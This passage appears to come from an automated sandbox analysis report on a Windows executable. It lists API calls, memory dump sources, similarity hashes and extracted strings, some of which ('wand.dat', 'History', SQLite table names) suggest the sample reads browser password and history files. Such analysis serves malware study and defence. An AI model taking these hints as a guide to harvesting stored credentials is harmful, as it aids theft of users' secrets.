                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                    • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                    • String ID: AE
                                                                                                                                                                                    • API String ID: 3548547718-685266089
                                                                                                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID: AE$"
                                                                                                                                                                                    • API String ID: 568519121-1989281832
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• sqlite_altertab_%s, xrefs: 0042EC4C
• Cannot add a column to a view, xrefs: 0042EBE8
• virtual tables may not be altered, xrefs: 0042EBD2
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• API String ID: 1297977491-2063813899
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
• wcslen.MSVCRT ref: 00410C74
• _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
• _wcsicmp.MSVCRT ref: 00410CCE
• _wcsicmp.MSVCRT ref: 00410CDF
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
APIs
• memset.MSVCRT ref: 00412057
  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
• GetKeyState.USER32(00000010), ref: 0041210D
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
